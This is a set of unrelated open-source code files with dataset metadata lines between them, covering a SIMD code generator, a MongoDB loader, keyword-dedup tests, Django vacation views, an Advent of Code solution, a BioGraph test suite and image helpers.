'any': lambda: allany1(opts, "any", simd_ext2, from_typ),
'reinterpret': lambda: reinterpret1(simd_ext2, from_typ, to_typ),
'reinterpretl': lambda: reinterpretl1(simd_ext2, from_typ, to_typ),
'cvt': lambda: convert1(simd_ext2, from_typ, to_typ),
'rec11': lambda: recs1("rec11", simd_ext2, from_typ),
'rec8': lambda: recs1("rec8", simd_ext2, from_typ),
'rsqrt11': lambda: recs1("rsqrt11", simd_ext2, from_typ),
'rsqrt8': lambda: recs1("rsqrt8", simd_ext2, from_typ),
'rec': lambda: recs1("rec", simd_ext2, from_typ),
'neg': lambda: neg1(simd_ext2, from_typ),
'nbtrue': lambda: nbtrue1(opts, simd_ext2, from_typ),
'reverse': lambda: reverse1(simd_ext2, from_typ),
'addv': lambda: addv(simd_ext2, from_typ),
'upcvt': lambda: upcvt1(simd_ext2, from_typ, to_typ),
'downcvt': lambda: downcvt1(simd_ext2, from_typ, to_typ),
'to_logical': lambda: to_logical1(opts, simd_ext2, from_typ),
'to_mask': lambda: to_mask1(opts, simd_ext2, from_typ),
'ziplo': lambda: zip_unzip_half("zip1", simd_ext2, from_typ),
'ziphi': lambda: zip_unzip_half("zip2", simd_ext2, from_typ),
'unziplo': lambda: zip_unzip_half("uzp1", simd_ext2, from_typ),
'unziphi': lambda: zip_unzip_half("uzp2", simd_ext2, from_typ),
'zip' : lambda: zip_unzip("zip", simd_ext2, from_typ),
'unzip' : lambda: zip_unzip("uzp", simd_ext2, from_typ),
'mask_for_loop_tail': lambda : mask_for_loop_tail(simd_ext, from_typ),
'iota': lambda : iota(simd_ext2, from_typ)
}
if simd_ext not in get_simd_exts():
raise ValueError('Unknown SIMD extension "{}"'.format(simd_ext))
if not from_typ in common.types:
raise ValueError('Unknown type "{}"'.format(from_typ))
if not func in impls:
return common.NOT_IMPLEMENTED
else:
return impls[func]()
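# Illustrative usage sketch (added note, not part of the original file): the generator
# is driven elsewhere; assuming an opts object exposing sve_emulate_bool, a driver is
# expected to call get_impl roughly like
#     body = get_impl(opts, 'add', 'aarch64', 'f32', 'f32')
# and wrap the returned C body in the corresponding nsimd_add_aarch64_f32 function.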
| 1.648438
| 2
|
db_dump/etender2mongoscripts/dumptenderitems.py
|
EBRD-MoldovaOpenContracting/Moldova-Data-Load
| 4
|
12783491
|
import pymongo
import os
import json
import myconfig

dbEtenders = myconfig.getMongoDb()
tender_items_collection = dbEtenders.tender_items_collection
# Clear any previously imported tender items before reloading.
tender_items_collection.remove({})

def dumpJsonFileToDatabase(jsonfile, collection):
    # Load one JSON file of the form {"rows": [...]} and insert every row.
    if os.path.isfile(jsonfile):
        with open(jsonfile) as _file:
            data = json.load(_file)
        for row in data["rows"]:
            collection.insert_one(row)

def dumpAllJsonFiles(jsonfolder, collection):
    print("dumping json from " + jsonfolder)
    for jsonfile in os.listdir(jsonfolder):
        if os.path.isfile(jsonfolder + os.sep + jsonfile):
            dumpJsonFileToDatabase(jsonfolder + os.sep + jsonfile, collection)

dumpAllJsonFiles(os.path.join(myconfig.jsonfolder, "tenderitems"), tender_items_collection)
| 2.9375
| 3
|
main.py
|
Forward-UIUC-2021F/haoxiang-sun-keyword-deduplication
| 0
|
12783492
|
from phrase_similarity import dedup_by_embedding, dedup_by_stemming
# Test1
result1 = dedup_by_stemming(['civilization', 'civil', 'computer'])
sol1 = ['civilization', 'computer']
if result1 == sol1:
print("Test 1 Passed")
else:
print("Test 1 Failed")
print(result1)
exit()
#Test 2
result2 = dedup_by_embedding(["database technique", "database techniques",
"cloud network", "cloud networks",
"machine learning",
"supervised learning",
"un supervised learning",
"data mining",
"data mining technique", "data mining techniques"])
sol2 = ['database technique',
'cloud network',
'machine learning',
'supervised learning',
'un supervised learning',
'data mining',
'data mining technique'
]
if result2 == sol2:
print("Test 2 Passed")
else:
print("Test 2 Failed")
print(result2)
exit()
#Test 3
result3 = dedup_by_embedding(["Linear Neural network",
"Convolutional Neural Network",
"Database system", "Database systems", "database system",
"data mining techniques", "Data mining methods",
"programming language", "program languages",
"cloud storage",
"cloud network", "cloud networks"])
sol3 = ['linear neural network',
'convolutional neural network',
'database system',
'data mining techniques',
'programming language',
'cloud storage',
'cloud network']
if result3 == sol3:
print("Test 3 Passed")
else:
print("Test 3 Failed")
print(result3)
exit()
#Test 4
result4 = dedup_by_embedding(["machine learning", "machine-learning", "machine learn",
"machine translation",
"machine translation system",
"machine translation evaluation",
"machine vision",
"machine vision system",
"machine vision application",
"machine intelligence", "machine consciousness", "machine perception",
"machine learning algorithm", "machine learning algorithms", "machine learn algorithm",
"machine learning techniques", "machine learning technique", "machine learn technique",
"machine learn method", "machine learning methods", "machine learning method",
"machine learning approach", "machine learn approach",
"machine learning classifiers", "machine learning classifier",
"machine-type communications", "machine type communications",
"machine-type communication", "machine type communication",
"machine structure", "machine structures"
])
sol4 = ['machine learning',
'machine translation',
'machine translation system',
'machine translation evaluation',
'machine vision',
'machine vision system',
'machine vision application',
'machine consciousness',
'machine learning algorithm',
'machine learning techniques',
'machine learning approach',
'machine learning classifiers',
'machine type communications',
'machine structure']
if result4 == sol4:
print("Test 4 Passed")
else:
print("Test 4 Failed")
print(result4)
exit()
#Test 5
result5 = dedup_by_embedding([
"data mining",
"data mining algorithm", "data mining technique",
"data structure", "data structures",
"database design",
"data stream", "data streams",
"database", "databases",
"data analysis", "data analytics",
"big data analytics",
"data visualization",
"database system",
"data privacy", "data security",
"image database",
"graph database",
])
sol5 = ['data mining',
'data mining algorithm',
'data mining technique',
'data structure',
'database design',
'data stream',
'database',
'data analysis',
'big data analytics',
'data visualization',
'database system',
'data privacy',
'image database',
'graph database']
if result5 == sol5:
print("Test 5 Passed")
else:
print("Test 5 Failed")
print(result5)
exit()
#Test 6
result6 = dedup_by_embedding(["helloworld", "world", "network"])
sol6 = ["helloworld", "world", "network"]
if result6 == sol6:
print("Test 6 Passed")
else:
print("Test 6 Failed")
print(result6)
exit()
| 3.203125
| 3
|
employee_portal/vacation_schedule/views.py
|
Dmitriy200123/employee_portal
| 0
|
12783493
|
import xlwt
from django.shortcuts import get_object_or_404, HttpResponse
from django.urls import reverse_lazy
from django.utils.datetime_safe import datetime
from django.views.generic import DetailView, ListView, UpdateView, DeleteView, TemplateView
# Create your views here.
from employee_information_site.models import Employee
from vacation_schedule.forms import VacationPeriodForm
from vacation_schedule.models import EmployeeVacationPeriod, DaysRemainder
class VacationListPage(ListView):
template_name = 'vacation_schedule/vacation_list_page.html'
model = EmployeeVacationPeriod
context_object_name = 'vacation_periods'
def get_queryset(self):
queryset = super().get_queryset()
employee = Employee.objects.filter(user=self.request.user.id).first()
current_year = datetime.now().year
return queryset.filter(employeeId=employee.id, startDateVacation__year=current_year)
def get_context_data(self, **kwargs):
context = super(VacationListPage, self).get_context_data(**kwargs)
employee = Employee.objects.filter(user=self.request.user.id).first()
context['current_user'] = employee
context['days_remainder'] = DaysRemainder.objects.filter(employee=employee).first()
return context
class UpdateOrCreateVacationPeriod(UpdateView):
model = EmployeeVacationPeriod
form_class = VacationPeriodForm
template_name = 'vacation_schedule/add_vacation_page.html'
success_url = reverse_lazy('vacation_schedule:vacationListPage')
context_object_name = 'vacation_period'
def get_object(self, **kwargs):
vacation_id = self.kwargs.get('id')
return self.model.objects.filter(id=vacation_id).first()
def form_invalid(self, form):
return self.form_validate(form)
def form_valid(self, form):
return self.form_validate(form)
def form_validate(self, form):
if not form.errors.get('employeeId') is None:
form.errors.pop('employeeId')
if not form.errors.get('vacationDays') is None:
form.errors.pop('vacationDays')
employee = Employee.objects.filter(user=self.request.user.id).first()
days_remainder = DaysRemainder.objects.filter(employee=employee).first()
if form.instance.vacationDays:
days_remainder.remainder += form.instance.vacationDays
form.instance.employeeId = employee
form.instance.vacationDays = (form.instance.endDateVacation - form.instance.startDateVacation).days
self.validate_date(form, days_remainder)
if form.is_valid():
days_remainder.remainder -= form.instance.vacationDays
days_remainder.save()
return super().form_valid(form)
return super().form_invalid(form)
def validate_date(self, form, days_remainder):
if form.instance.vacationDays <= 0:
form.add_error('endDateVacation', 'The vacation end date is invalid')
if form.instance.vacationDays > days_remainder.remainder:
form.add_error('vacationDays', 'More days selected than remaining')
vacation_periods = self.model.objects.filter(employeeId=days_remainder.employee)
if vacation_periods:
if any(x for x in vacation_periods if self.check_date_intersection(form, x)):
form.add_error('startDateVacation',
'The vacation period overlaps with previous periods')
def get_context_data(self, **kwargs):
context = super(UpdateOrCreateVacationPeriod, self).get_context_data(**kwargs)
current_user = Employee.objects.filter(user=self.request.user.id).first()
context['current_user'] = current_user
return context
@staticmethod
def check_date_intersection(form, vacation_period):
return form.instance.id != vacation_period.id and (
vacation_period.startDateVacation <= form.instance.startDateVacation <= vacation_period.endDateVacation
or vacation_period.startDateVacation <= form.instance.endDateVacation <= vacation_period.endDateVacation
or form.instance.startDateVacation <= vacation_period.startDateVacation <= form.instance.endDateVacation
or form.instance.startDateVacation <= vacation_period.endDateVacation <= form.instance.endDateVacation)
class DeleteVacationPeriod(DeleteView):
model = EmployeeVacationPeriod
success_url = reverse_lazy('vacation_schedule:vacationListPage')
context_object_name = 'period'
def get_object(self, **kwargs):
vacation_id = self.kwargs.get('id')
return get_object_or_404(self.model, id=vacation_id)
def delete(self, request, *args, **kwargs):
vacation_period = self.get_object(**kwargs)
days_remainder = DaysRemainder.objects.filter(employee=vacation_period.employeeId).first()
days_remainder.remainder += vacation_period.vacationDays
if days_remainder.remainder > days_remainder.maxCountDays.maxCountDays:
days_remainder.remainder = days_remainder.maxCountDays.maxCountDays
days_remainder.save()
return super(DeleteVacationPeriod, self).delete(request, *args, **kwargs)
class EmployeeVacationPage(TemplateView):
template_name = 'vacation_schedule/employee_vacation_page.html'
def get_context_data(self, **kwargs):
context = super(EmployeeVacationPage, self).get_context_data(**kwargs)
current_user = Employee.objects.filter(user=self.request.user.id).first()
context['current_user'] = current_user
return context
class ExportVacationXlsView(DetailView):
def get(self, request, *args, **kwargs):
response = HttpResponse(content_type='application/ms-excel')
response['Content-Disposition'] = 'attachment; filename="users.xls"'
wb = xlwt.Workbook(encoding='utf-8')
ws = wb.add_sheet('Users')
row_num = 0
columns = [field for field in EmployeeVacationPeriod._meta.get_fields()][1:]
for col_num in range(len(columns)):
ws.write(row_num, col_num, columns[col_num].verbose_name)
rows = EmployeeVacationPeriod.objects.all()
for row_object in rows:
row_num += 1
for col_num, value in enumerate(columns):
ws.write(row_num, col_num, str(getattr(row_object, value.name)))
wb.save(response)
return response
| 2.140625
| 2
|
2020/day02/solve.py
|
h3ssto/advent_of_code
| 0
|
12783494
|
from _shared_python.aoc import *
#------------------------------------------------------------------------------#
INPUT = input_from_file(__file__)
INPUT = map_split(INPUT, r"-|\s+|:\s+")
INPUT = entries_as_tuples(INPUT, types = (int, int, str, str))
#------------------------------------------------------------------------------#
preview_input(INPUT)
#------------------------------------------------------------------------------#
output1 = 0
output2 = 0
#------------------------------------------------------------------------------#
for l,u,c,s in INPUT:
s1 = [x for x in s if x == c]
if l <= len(s1) <= u:
output1 += 1
if (s[l-1] == c) != (s[u-1] == c):
output2 += 1
#------------------------------------------------------------------------------#
print("-" * 64)
print("Output 1:", green(output1))
print("Output 2:", green(output2))
| 2.90625
| 3
|
code/single_scene_optimization.py
|
dukomoran/PESFM
| 52
|
12783495
|
import cv2 # DO NOT REMOVE
from datasets import SceneData, ScenesDataSet
import train
from utils import general_utils, path_utils
from utils.Phases import Phases
import torch
def train_single_model(conf, device, phase):
# Create data
scene_data = SceneData.create_scene_data(conf)
# Create model
model = general_utils.get_class("models." + conf.get_string("model.type"))(conf).to(device)
if phase is Phases.FINE_TUNE:
path = path_utils.path_to_model(conf, Phases.TRAINING)
model.load_state_dict(torch.load(path))
# Sequential Optimization
if conf.get_bool("train.sequential", default=False):
n_cams = scene_data.y.shape[0]
conf['train']['num_of_epochs'] = 1000
conf['train']['scheduler_milestone'] = []
for subset_size in range(2, n_cams):
print("########## Train model on subset of size {} ##########".format(subset_size))
subset_data = SceneData.get_subset(scene_data, subset_size)
conf["dataset"]["scan"] = subset_data.scan_name
subscene_dataset = ScenesDataSet.ScenesDataSet([subset_data], return_all=True)
subscene_loader = ScenesDataSet.DataLoader(subscene_dataset).to(device)
_, _, _, _ = train.train(conf, subscene_loader, model, phase)
conf['train']['num_of_epochs'] = 20000
conf['train']['scheduler_milestone'] = [10000]
conf["dataset"]["scan"] = scene_data.scan_name
# Optimize Scene
scene_dataset = ScenesDataSet.ScenesDataSet([scene_data], return_all=True)
scene_loader = ScenesDataSet.DataLoader(scene_dataset).to(device)
train_stat, train_errors, _, _ = train.train(conf, scene_loader, model, phase)
# Write results
train_errors.drop("Mean", inplace=True)
train_stat["Scene"] = train_errors.index
train_stat.set_index("Scene", inplace=True)
train_res = train_errors.join(train_stat)
general_utils.write_results(conf, train_res, file_name="Results_" + phase.name, append=True)
if __name__ == "__main__":
conf, device, phase = general_utils.init_exp(Phases.OPTIMIZATION.name)
train_single_model(conf, device, phase)
| 2.625
| 3
|
python/functest/sdk_test.py
|
spiralgenetics/biograph
| 16
|
12783496
|
<reponame>spiralgenetics/biograph<filename>python/functest/sdk_test.py
"""
sdk.py: Test the python SDK and ipython notebooks.
"""
import os
import glob
import queue
import unittest
import subprocess
import tabix
from python.functest.utils.setup import (
ftest_setup,
ftest_teardown,
ftest_module_setup
)
from python.functest.utils.fileops import (
sha1_file
)
from python.functest.utils.defaults import (
GOLDEN_DIR
)
import biograph
from biograph.tools.coverage import MICROCONTIGS, get_regions
def setUpModule():
""" Announce ourselves by printing the module docstring. """
print(__doc__)
# Module requirements
ftest_module_setup()
class SDKTestCases(unittest.TestCase):
""" unittest Test definitions follow """
# keep pylint happy
data_dir = None
def setUp(self):
ftest_setup(self)
def tearDown(self):
ftest_teardown(self)
def check(self, cmd, code=0):
""" Run a shell command, assert exit code is correct """
actual = subprocess.call(cmd # + ">/dev/null 2>&1"
, shell=True)
self.assertEqual(code, actual, f"{cmd} exited code {actual}")
def check_results(self, file1, file2):
""" sha1 two files, throw if they don't match """
self.assertEqual(sha1_file(test=self, file_name=file1),
sha1_file(file2), "%s and %s do not match" % (file1, file2))
# @unittest.skip('nope')
def test_basic_sdk(self):
"""
Basic SDK test
"""
my_bg = biograph.BioGraph("datasets/lambdaToyData/benchmark/proband_lambda.bg")
self.assertEqual(my_bg.metadata.accession_id, 'proband')
self.assertEqual(my_bg.metadata.samples['proband'], '47b43dbb0306fb5da00bca9c33b2fb3de9db7bf4')
self.assertEqual(str(my_bg.seqset.find('ACGT')), '<SeqsetEntry 11049-11336: ACGT>')
self.assertEqual(my_bg.seqset.size(), 97340)
r = my_bg.open_readmap()
self.assertEqual(r.get_num_bases(), 7235142)
stats = r.get_pair_stats()
self.assertEqual(stats.paired_reads, 39974)
self.assertEqual(stats.unpaired_reads, 8982)
# @unittest.skip('nope')
def test_basic_sdk_reference(self):
"""
Basic reference test
"""
grch37 = biograph.Reference("/reference/human_g1k_v37/")
# 16 contigs in chr 7
self.assertEqual(len(grch37.find_ranges("7", 1, 1000000000)), 16)
# 11 contigs in chr 21
self.assertEqual(len(grch37.find_ranges("21", 1, 1000000000)), 11)
rc = grch37.find('ACGT')
self.assertEqual(rc.matches, 2153084)
# @unittest.skip('nope')
def test_sequence_splice(self):
"""
Testing the splicing/indexing and string comparisons for sequence
"""
string = "ATCGAATACATAA"
j = biograph.Sequence(string)
# Some random splicing and access
self.assertEqual(string[1], j[1])
self.assertEqual(string[1:5], j[1:5])
# self.assertEqual(string[2:7:2], j[2:7:2])
# self.assertEqual(string[::-1], j[::-1])
# @unittest.skip('nope')
def test_bgtools_basic(self):
""" bgtools script tests """
bgtools = "./python/functest/biograph_main "
# exit 1
self.check(bgtools, code=1)
# exit 0
self.check(f"{bgtools} -h")
# version
cmd = f"{bgtools} version"
self.assertEqual(subprocess.check_output(cmd, shell=True).rstrip().decode(), f"biograph version {biograph.version()}")
# Every command we ship should have a help
for cmd in (
"full_pipeline",
"reference",
"create",
"discovery",
"coverage",
"qual_classifier",
"vdb",
"stats",
):
self.check(f"{bgtools} {cmd} -h")
# @unittest.skip('nope')
def test_bgtools_stats(self):
""" bgtools script tests """
self.maxDiff = None
bgtools = "./python/functest/biograph_main "
cmd = f"{bgtools} stats -b golden/e_coli_merged.bg -r datasets/reference/e_coli_k12_ASM584v1/"
# pylint: disable=bad-continuation
self.assertEqual(subprocess.check_output(cmd, shell=True).decode(),
"""Sample: e_coli_test
NumReads: 38,047
NumBases: 3,804,700
MaxReadLength: 100
MinReadLength: 100
NumPairedReads: 25,762
NumUnpairedReads: 12,285
NumPairedBases: 2,576,200
NumUnpairedBases: 1,228,500
MeanInsertSize: 504.73
MedianInsertSize: 502.00
SDInsertSize: 49.72
EstimatedCoverage: 0.80
Sample: test_accession_id
NumReads: 8,444
NumBases: 288,464
MaxReadLength: 35
MinReadLength: 30
NumPairedReads: 0
NumUnpairedReads: 8,444
NumPairedBases: 0
NumUnpairedBases: 288,464
MeanInsertSize: 0.00
MedianInsertSize: 0.00
SDInsertSize: 0.00
EstimatedCoverage: 0.06
""")
# @unittest.skip('nope')
def test_bgtools_pcmp(self):
""" bgtools script tests """
os.environ['PATH'] = "/share/software/bin:" + os.environ['PATH']
bgtools = "./python/functest/biograph_main "
bgb = "./modules/biograph/bgbinary "
dd = self.data_dir
self.check(f"{bgb} create --in datasets/bams/e_coli/e_coli_test.bam --out {dd}/e_coli.bg --ref datasets/reference/e_coli_k12_ASM584v1/")
self.check(f"{bgb} discovery --in {dd}/e_coli.bg --out {dd}/e_coli_variants.vcf --enable-pop-tracer=false --ref datasets/reference/e_coli_k12_ASM584v1/")
self.assertEqual(subprocess.call(f"vcf-sort < {dd}/e_coli_variants.vcf | bgzip > {dd}/e_coli_variants.vcf.gz", shell=True), 0)
self.check(f"tabix {dd}/e_coli_variants.vcf.gz")
self.check(f"{bgtools} coverage -d {dd}/ecoli.cov.jl -b {dd}/e_coli.bg -v {dd}/e_coli_variants.vcf.gz -r datasets/reference/e_coli_k12_ASM584v1/ -o /dev/stdout | vcf-sort > {dd}/output.vcf")
self.check(f"{bgb} discovery --in {dd}/e_coli.bg --out {dd}/e_coli_variants_ml.vcf --ref datasets/reference/e_coli_k12_ASM584v1/")
self.assertEqual(subprocess.call(f"vcf-sort < {dd}/e_coli_variants_ml.vcf | bgzip > {dd}/e_coli_variants_ml.vcf.gz", shell=True), 0)
self.check(f"tabix {dd}/e_coli_variants_ml.vcf.gz")
self.check(f"{bgtools} coverage -d {dd}/e_coli_ml.cov.jl -b {dd}/e_coli.bg -v {dd}/e_coli_variants_ml.vcf.gz -r datasets/reference/e_coli_k12_ASM584v1/ -o /dev/stdout | vcf-sort > {dd}/output2.vcf")
# Better test would be truvari to validate the actual variants, but an identical output line count is close enough for now.
self.assertEqual(subprocess.check_output(f"wc -l < {dd}/output.vcf", shell=True).rstrip(), b'166', 0)
# This will exit 1 if exceptions correctly propagate from child workers back up to the main process (DEV-511)
self.check(f"{bgtools} coverage -d {dd}/ecoli.cov.jl -b {dd}/e_coli.bg -v golden/ftest/bad.vcf.gz -r datasets/reference/e_coli_k12_ASM584v1 -o {dd}/bad_out.vcf", 1)
# @unittest.skip('nope')
def test_bgtools_qual_classifier(self):
""" bgtools script tests """
os.environ['PATH'] = "/share/software/bin:" + os.environ['PATH']
dd = self.data_dir
bgtools = "./python/functest/biograph_main "
toydata = "datasets/ml_toydata_lambda"
sample_dir = "proband_jul17"
golden_file = "proband_17feb2021"
df = f"{toydata}/{sample_dir}/df.jl"
grm = f"{toydata}/{sample_dir}/grm.jl"
pcmp = f"{toydata}/{sample_dir}/pcmp.vcf.gz"
sv_ao_model = "python/functest/biograph_model.ml"
# Strip headers and compare variants for sv and ao
self.check(f"{bgtools} qual_classifier --grm {grm} --dataframe {df} --vcf {pcmp} --model {sv_ao_model} --out {dd}/sv_ao.vcf")
self.check(f"grep -v ^# {GOLDEN_DIR}/ml/{golden_file}.filter.vcf > {dd}/sv_ao.golden.vcf")
self.check(f"vcf-sort < {dd}/sv_ao.vcf | grep -v ^# > {dd}/sv_ao.check.vcf")
self.check_results(f"{dd}/sv_ao.golden.vcf", f"{dd}/sv_ao.check.vcf")
# @unittest.skip('nope')
def test_coverage_microcontigs(self):
""" microcontig boundary generation tests """
contigq = queue.Queue()
workerq = queue.Queue()
variants = set()
ref = biograph.Reference('datasets/reference/e_coli_k12_ASM584v1/')
# This VCF should cover every edge case (multiple variants on the same
# position, deletions that span a boundary, begin, end, one before begin, one
# after end, with and without a bed file, etc.)
#
# This tests counts on the vcf ID field being unique for each variant
vcf_file = f'{GOLDEN_DIR}/microcontigs.vcf.gz'
for bed_file in None, f'{GOLDEN_DIR}/microcontigs.bed':
for clearance in range(2, 10):
for contig_size in range(1, 20):
for region in get_regions(bed_file, ref):
contigq.put(region)
contigq.put(None)
# Find the microcontigs
while True:
item = contigq.get()
if item is None:
break
MICROCONTIGS.find(item, vcf_file, clearance, contig_size, workerq)
workerq.put(None)
# Add every variant
t = tabix.open(vcf_file)
for ctg in ref.scaffolds:
try:
for v in t.query(ctg, 0, int(ref.scaffold_lens[ctg])):
variants.add(v[2])
except tabix.TabixError:
pass
self.assertTrue(len(variants) > 0, f"No variants to process. Are you using the correct reference? (bed: {bed_file} clearance: {clearance} contig_size: {contig_size})")
# Remove each variant, one microcontig at a time
while True:
contig = workerq.get()
if contig is None:
break
# print(contig)
for v in t.query(contig[0], contig[1], contig[2]):
# This will raise if the variant was previously removed
variants.remove(v[2])
# There should be none left over
self.assertEqual(len(variants), 0, f"There were {len(variants)} unprocessed variants remaining. (bed: {bed_file} clearance: {clearance} contig_size: {contig_size})")
def setup_dirs(self):
"Makes a bin directory with bgbinary, biograph, and truvari, and adds it to the path."
bindir = os.path.join(self.data_dir, "bin")
tmpdir = os.path.join(self.data_dir, "tmp")
for dirname in bindir, tmpdir:
os.mkdir(dirname)
os.symlink(os.getcwd() + "/modules/biograph/bgbinary", bindir + "/bgbinary")
truvari_dir = glob.glob(os.getcwd() + "/external/*pypi__Truvari_2*/Truvari-*.data/scripts")[0]
os.symlink(os.getcwd() + "/python/functest/biograph_main", bindir + "/biograph")
with open(bindir + "/truvari", "w") as f:
f.write(f"""#!/bin/sh\nexec python3 {truvari_dir}/truvari "$@"\n""")
os.chmod(bindir + "/truvari", 0o755)
os.environ['PATH'] = (bindir + ":" +
os.environ['PATH'] + ":" +
"/share/software/bin")
return tmpdir
@unittest.skip('lambda toydata is broken')
def test_bgtools_squareoff(self):
""" bgtools script tests """
self.setup_dirs()
dd = self.data_dir
toydata = "/share/ml_toydata_lambda"
sample_dir = "proband_jul17"
golden_file = "proband_16feb2021"
pcmp = f"{toydata}/{sample_dir}/pcmp.vcf.gz"
sv_ao_model = "/share/classifier/model_sv_ao_gt_16Feb2021.ml"
bg = "datasets/lambdaToyData/benchmark/proband_lambda.bg"
ref = "datasets/lambdaToyData/benchmark/ref_lambda/"
self.check(f"biograph squareoff -b {bg} --variants {pcmp} --model {sv_ao_model} --reference {ref} -o {dd}/sq.vcf.gz")
self.check(f"zcat {dd}/sq.vcf.gz | vcf-sort | grep -v ^# > {dd}/sq.check.vcf")
self.check(f"grep -v ^# {GOLDEN_DIR}/ml/{golden_file}.filter.vcf > {dd}/sv_ao.golden.vcf")
with open(f"{dd}/sv_ao.golden.vcf") as fha, open(f"{dd}/sq.check.vcf") as fhb:
acnt = len(fha.readlines())
bcnt = len(fhb.readlines())
self.assertEqual(acnt, bcnt, f"Incorrect line counts {acnt} != {bcnt}")
# @unittest.skip('runipy output is not deterministic')
# def test_notebooks(self):
# """
# Test all jupyter (iPython) notebooks
# This doesn't currently work because runipy doesn't produce deterministic output
# when the script writes to STDOUT (the output fields are arbitrarily chunked and
# impossible to compare without further manipulation.)
# To make golden files for new notebooks, run this:
# runipy new_notebook.ipynb $GOLDEN_DIR/jupyter/new_notebook.ipynb.out
# """
# ipydir = "{0}/python/jupyter/biograph/".format(SPIRAL_ROOT)
# for f in os.listdir(ipydir):
# if f.endswith(".ipynb"):
# self.check("runipy '{0}/{1}' '{2}/{1}.out'".format(ipydir, f, self.data_dir))
# # strip out "matplotlib.figure.Figure at <0xaddress>" from txt lines
# subprocess.call(
# "grep -v matplotlib.figure.Figure '{0}/{1}.out' > '{0}/{1}.out.clean'".format(self.data_dir, f), shell=True)
# self.check_results('{0}/jupyter/{1}.out'.format(
# GOLDEN_DIR, f), '{0}/{1}.out.clean'.format(self.data_dir, f))
if __name__ == '__main__':
unittest.main(verbosity=2)
| 2.203125
| 2
|
backend/src/procyon_api/domain/exceptions/root.py
|
KitKod/Procyon
| 0
|
12783497
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
class ProcyonException(Exception):
code = "root_exception"
class NotFoundError(ProcyonException):
code = "not_found_error"
class AlreadyExistsError(ProcyonException):
code = "already_exists_error"
class ForbiddenError(ProcyonException):
code = "forbidden_error"
| 1.820313
| 2
|
helpers.py
|
andodevel/rmbg
| 0
|
12783498
|
<gh_stars>0
import datetime
import os
import timeit
import cv2
import numpy as np
from config import get_logger
logger = get_logger()
class Timer:
"""Measure time used."""
def __init__(self, id: str, round_ndigits: int = 2):
self._id = id
self._round_ndigits = round_ndigits
self._start_time = (timeit.default_timer() * 1000)
def __call__(self) -> float:
return (timeit.default_timer() * 1000) - self._start_time
def __str__(self) -> str:
return f"Time elapsed of `{self._id}`: " + str(
datetime.timedelta(milliseconds=round(self(), self._round_ndigits)))
def time_exec(id, method, *args, **kwargs):
_timer = Timer(id)
result = method(*args, **kwargs)
logger.info(_timer)
return result
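# Minimal usage sketch (illustration only; `image` is a placeholder array):
# the elapsed time of the call is logged under the label "resize".
#   result = time_exec("resize", resize_image, image, width=320)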
def load_image(imagePath):
image = cv2.imread(imagePath)
if image is None:
raise Exception(f"Invalid image with path `{imagePath}`")
return cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
def to_gray_image(image):
gray_image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
return cv2.cvtColor(gray_image, cv2.COLOR_GRAY2RGB)
def rgb_to_lab(image):
return cv2.cvtColor(image, cv2.COLOR_RGB2LAB)
def apply_image_mask(masks, image, fallback_image):
"""Apply mask to image, masked pixel keep original value,
otherwise use its gray version"""
return np.where(
masks,
image,
fallback_image
).astype(np.uint8)
def slide_window(array, window=(0,), a_steps=None, w_steps=None, axes=None, to_end=True):
array = np.asarray(array)
orig_shape = np.asarray(array.shape)
window = np.atleast_1d(window).astype(int) # maybe crude to cast to int...
if axes is not None:
axes = np.atleast_1d(axes)
w = np.zeros(array.ndim, dtype=int)
for axis, size in zip(axes, window):
w[axis] = size
window = w
# Check if window is legal:
if window.ndim > 1:
raise ValueError("`window` must be one-dimensional.")
if np.any(window < 0):
raise ValueError("All elements of `window` must be larger then 1.")
if array.ndim < len(window):
raise ValueError("`window` length must be less or equal `array` dimension.")
tmp_a_steps = np.ones_like(orig_shape)
if a_steps is not None:
a_steps = np.atleast_1d(a_steps)
if a_steps.ndim != 1:
raise ValueError("`asteps` must be either a scalar or one dimensional.")
if len(a_steps) > array.ndim:
raise ValueError("`asteps` cannot be longer then the `array` dimension.")
# does not enforce alignment, so that steps can be same as window too.
tmp_a_steps[-len(a_steps):] = a_steps
if np.any(a_steps < 1):
raise ValueError("All elements of `asteps` must be larger then 1.")
a_steps = tmp_a_steps
tmp_w_steps = np.ones_like(window)
if w_steps is not None:
w_steps = np.atleast_1d(w_steps)
if w_steps.shape != window.shape:
raise ValueError("`wsteps` must have the same shape as `window`.")
if np.any(w_steps < 0):
raise ValueError("All elements of `wsteps` must be larger then 0.")
tmp_w_steps[:] = w_steps
tmp_w_steps[window == 0] = 1 # make sure that steps are 1 for non-existing dims.
w_steps = tmp_w_steps
# Check that the window would not be larger then the original:
if np.any(orig_shape[-len(window):] < window * w_steps):
raise ValueError("`window` * `wsteps` larger then `array` in at least one dimension.")
new_shape = orig_shape # just renaming...
# For calculating the new shape 0s must act like 1s:
_window = window.copy()
_window[_window == 0] = 1
new_shape[-len(window):] += w_steps - _window * w_steps
new_shape = (new_shape + a_steps - 1) // a_steps
# make sure the new_shape is at least 1 in any "old" dimension (i.e. when
# steps are too large); we do not care beyond that.
new_shape[new_shape < 1] = 1
shape = new_shape
strides = np.asarray(array.strides)
strides *= a_steps
new_strides = array.strides[-len(window):] * w_steps
# The full new shape and strides:
if to_end:
new_shape = np.concatenate((shape, window))
new_strides = np.concatenate((strides, new_strides))
else:
_ = np.zeros_like(shape)
_[-len(window):] = window
_window = _.copy()
_[-len(window):] = new_strides
_new_strides = _
new_shape = np.zeros(len(shape) * 2, dtype=int)
new_strides = np.zeros(len(shape) * 2, dtype=int)
new_shape[::2] = shape
new_strides[::2] = strides
new_shape[1::2] = _window
new_strides[1::2] = _new_strides
new_strides = new_strides[new_shape != 0]
new_shape = new_shape[new_shape != 0]
return np.lib.stride_tricks.as_strided(array, shape=new_shape, strides=new_strides)
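# Quick illustration (added note, not in the original): with the defaults,
# slide_window(np.arange(10), window=3) returns an (8, 3) strided view whose
# rows are the overlapping length-3 windows [0,1,2], [1,2,3], ..., [7,8,9].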
def simple_correlate(array, kernel):
pass
